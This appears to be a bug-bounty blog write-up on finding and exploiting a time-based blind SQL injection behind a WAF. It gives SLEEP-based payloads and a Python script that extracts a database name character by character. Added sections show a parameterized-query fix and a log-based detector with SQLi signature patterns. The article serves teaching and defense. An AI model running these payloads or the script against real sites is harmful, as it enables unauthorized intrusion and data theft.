Unauthorized SQL Injection: Turning ‘No Entry’ Signs into Dollar Signs!


Pushkar Bhagat

SQL injection vulnerabilities continue to pose a significant risk to web application security. One particularly sophisticated variant is time-based SQL injection, which allows attackers to infer information about the database by manipulating SQL queries. In this post, we’ll explore how to identify and exploit this vulnerability effectively while also discussing its potential impact and ethical considerations.

Discovering the Vulnerability

During a recent security assessment of a private program, I came across a login page. Searching its source for an ID parameter, I found a path of the form content/id/77. To check whether this parameter reached the database, I appended a single quote (') to the ID value: if the value was being placed into an SQL query, the stray quote would likely break the query and surface a vulnerability.

After testing various IDs and receiving a MySQL server error instead of a 404 response, I suspected an SQL injection vulnerability. However, a Web Application Firewall (WAF) was in place, blocking common special characters and suspicious keywords, which complicated my efforts. Even SQLMAP struggled to interact with the endpoint due to these WAF restrictions.

To get around the WAF, I started testing payloads by hand, and the simplest one went through:

content/id/77 AND SLEEP(60)

This payload makes the database pause for 60 seconds if the injection works. Because AND is a logical operator, the whole WHERE clause is only true when every condition is true, so the database has to evaluate SLEEP(60) alongside the original id check. Observing the delayed response confirmed that the payload was executed, indicating a time-based SQL injection vulnerability.
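The reason the payload works is visible in the application code, not in the payload itself: the id from the route is pasted into the SQL text. The following example, written for this post and not taken from the target application, puts that pattern next to the fix (integer validation plus a bound parameter). It uses an in-memory SQLite table standing in for the site's content table; SQLite has no SLEEP() function, so the boolean form of the same injection ("77 AND 1=0") is used to show that the database evaluates attacker-supplied conditions, which is the channel the timing payload relies on. The table, column and function names are assumptions for the example.

```python
import re
import sqlite3


def demo_db():
    # Constructed in-memory table standing in for the site's content table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)",
                     [(77, "public post"), (78, "another post")])
    return conn


def lookup_vulnerable(conn, raw_id):
    # The route segment is pasted into the SQL text, so whatever follows the
    # number becomes part of the WHERE clause and is evaluated by the database.
    # This is the pattern that lets "77 AND SLEEP(60)" run against MySQL.
    sql = f"SELECT title FROM content WHERE id = {raw_id}"
    return [row[0] for row in conn.execute(sql)]


def validate_id(raw_id):
    # Accept only a plain decimal integer; return None for anything else.
    if re.fullmatch(r"[0-9]{1,18}", raw_id) is None:
        return None
    return int(raw_id)


def lookup_hardened(conn, raw_id):
    item_id = validate_id(raw_id)
    if item_id is None:
        # Reject before touching the database: a 400 response, not a MySQL error page.
        raise ValueError("id must be a plain integer")
    # Bound parameter: the value is sent separately from the SQL text and is
    # never parsed as SQL, so operators or function calls inside it have no effect.
    rows = conn.execute("SELECT title FROM content WHERE id = ?", (item_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = demo_db()
    for raw in ("77", "77 AND 1=1", "77 AND 1=0"):
        print(f"vulnerable {raw!r:<14} -> {lookup_vulnerable(conn, raw)}")
        try:
            print(f"hardened   {raw!r:<14} -> {lookup_hardened(conn, raw)}")
        except ValueError as exc:
            print(f"hardened   {raw!r:<14} -> rejected ({exc})")
```

Run it and the vulnerable lookup returns the post for "77 AND 1=1" but nothing for "77 AND 1=0": the database is answering the attacker's question. The hardened lookup never lets the second form reach the database. A WAF that blocks keywords, as in the write-up, is a secondary control sitting in front of this bug; the parameterized query removes the bug itself, and rejecting the input up front also stops the MySQL error page that gave the first hint.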

Extracting Database Information

With the existence of the vulnerability confirmed, the next challenge was to extract sensitive information, such as the database name. Knowing the database name had a confirmed length of 11 characters, we needed a method to systematically identify each character.

To test if the first character of the database name was 'a', I crafted the following payload:

id=20 AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)

This payload would introduce a 5-second delay if the first character matched 'a'. By iterating through each character in the alphabet (and possibly numbers or special characters), we could identify the exact characters of the database name.

Automating the Exploitation Process

While manually testing each character can yield results, it is often laborious and time-consuming. Thankfully, we can automate this process using tools like SQLMap; however, in my case, it was blocking me, so I wrote a Python script. Here’s a simplified Python script that automates the character extraction process:

import requests
import time

# Base URL with the injection point; the id (77) is supplied by the payload below
url = "https://www.REDACTED.com/{PATH}/"
# Define the character set to test (extend if necessary)
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
db_name_length = 11  # Confirmed length of the database name
db_name = ""

# Loop through each position of the database name
for position in range(1, db_name_length + 1):
    for char in characters:
        # Construct the payload with the current character
        payload = f"77 AND IF(SUBSTRING(database(),{position},1)='{char}',SLEEP(5),0)"

        # Add a delay of 60 seconds before each request
        time.sleep(60)

        # Send the request with the payload and time the round trip;
        # the timeout stops a hung connection from blocking the loop forever
        start_time = time.time()
        response = requests.get(url + payload, timeout=30)
        elapsed_time = time.time() - start_time

        # Check if the response took longer than 5 seconds
        if elapsed_time >= 5:
            db_name += char  # Append the found character to the db_name
            print(f"Found character '{char}' at position {position}: {db_name}")
            break  # Move to the next position

print(f"Database name is: {db_name}")

Setup: Define the target URL and the character set for potential database name characters.
Iterate Over Characters: For each position in the database name, iterate through possible characters.
Payload Execution: Construct the SQL injection payload and send a request to the target URL.
Adding a Delay Before Each Request: A 60-second pause before every request. For time-based SQL injection this keeps one request's delayed response from overlapping the next, so the response time can be measured cleanly; the trade-off is that the whole run becomes much slower.
Response Timing: Measure the response time to determine if the character matches.
Character Collection: If a delay occurs, the script records the character and moves to the next position.
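A loop like the one above leaves a clear trace in the web server's access log: one client, one route, requests whose decoded path contains SLEEP( or IF(SUBSTRING(database()..., and response times that jump from milliseconds to five seconds whenever a character guess is right. The following detection script is an added example written for this post, not something from the write-up or the target; it parses a constructed log excerpt in a combined-log layout with a trailing request-time field (the shape nginx produces with $request_time appended), computes a per-route response-time baseline from requests that carry no injection signature, and flags lines by signature, by timing, or by a quote-bearing request that produced a 5xx. The log lines, thresholds and field layout are assumptions.

```python
import re
import statistics
from urllib.parse import unquote

# Constructed sample: combined log format with request time (seconds) appended.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2025:10:01:02 +0000] "GET /content/id/77 HTTP/1.1" 200 512 0.012
10.0.0.5 - - [12/Mar/2025:10:01:03 +0000] "GET /content/id/78 HTTP/1.1" 200 498 0.015
10.0.0.9 - - [12/Mar/2025:10:02:10 +0000] "GET /content/id/77' HTTP/1.1" 500 231 0.011
10.0.0.9 - - [12/Mar/2025:10:02:45 +0000] "GET /content/id/77%20AND%20SLEEP(60) HTTP/1.1" 200 512 60.021
10.0.0.9 - - [12/Mar/2025:10:04:01 +0000] "GET /content/id/77%20AND%20IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0) HTTP/1.1" 200 512 0.013
10.0.0.9 - - [12/Mar/2025:10:04:07 +0000] "GET /content/id/77%20AND%20IF(SUBSTRING(database(),1,1)='b',SLEEP(5),0) HTTP/1.1" 200 512 5.019
10.0.0.7 - - [12/Mar/2025:10:05:00 +0000] "GET /content/id/79 HTTP/1.1" 404 112 0.009
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>\d+\.\d+)$'
)

# Function calls typical of time-based and boolean-based probes (assumed signature list).
SQLI_TOKENS = re.compile(
    r"(?i)(?:sleep|benchmark|substring|substr|if)\s*\(|database\s*\(\s*\)"
    r"|waitfor\s+delay|\bunion\s+select\b"
)

SLOW_SECONDS = 3.0   # absolute floor: SLEEP(5) probes land well above it
SLOW_FACTOR = 10.0   # or ten times the route's normal median, whichever is larger


def parse_line(line):
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["path"])   # decode %20 etc. before matching
    rec["status"] = int(rec["status"])
    rec["rt"] = float(rec["rt"])
    # Route template: first two path segments, e.g. /content/id, so that every
    # id value shares one timing baseline.
    rec["route"] = "/".join(rec["path"].split("?", 1)[0].split("/")[:3])
    return rec


def find_sqli(log_text):
    recs = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    # Baseline per route from requests that show no injection signature.
    baseline = {}
    for r in recs:
        if not SQLI_TOKENS.search(r["path"]):
            baseline.setdefault(r["route"], []).append(r["rt"])
    medians = {route: statistics.median(v) for route, v in baseline.items()}

    findings = []
    for lineno, r in enumerate(recs, 1):
        reasons = []
        if SQLI_TOKENS.search(r["path"]):
            reasons.append("sql-signature")
        med = medians.get(r["route"], 0.0)
        if r["rt"] >= max(SLOW_SECONDS, SLOW_FACTOR * med):
            reasons.append(f"slow:{r['rt']:.3f}s(median {med:.3f}s)")
        if r["status"] >= 500 and "'" in r["path"]:
            reasons.append("quote-triggered-5xx")
        if reasons:
            findings.append({"line": lineno, "ip": r["ip"],
                             "path": r["path"], "reasons": reasons})
    return findings


def count_by_ip(findings):
    # Many hits from one address on one route is the enumeration loop itself.
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_sqli(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']:>2} {h['ip']:<10} {', '.join(h['reasons'])}  {h['path']}")
    print("per source:", count_by_ip(hits))
```

Two of the three rules are independent of the keyword list, which matters because the write-up's point is that the WAF's keyword filter was beaten: a correct guess still costs five seconds of server time, and the quote that produced a MySQL error still shows up as a 5xx. Pairing the per-route baseline with the fixed floor keeps a genuinely slow endpoint from being flagged on every request.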

By systematically extracting data from the database, tables, and columns, you can maximize the exploitation of blind SQL injection vulnerabilities. Always ensure you have permission to test the systems, and be aware of the legal and ethical implications of your actions.

Happy Hacking!!
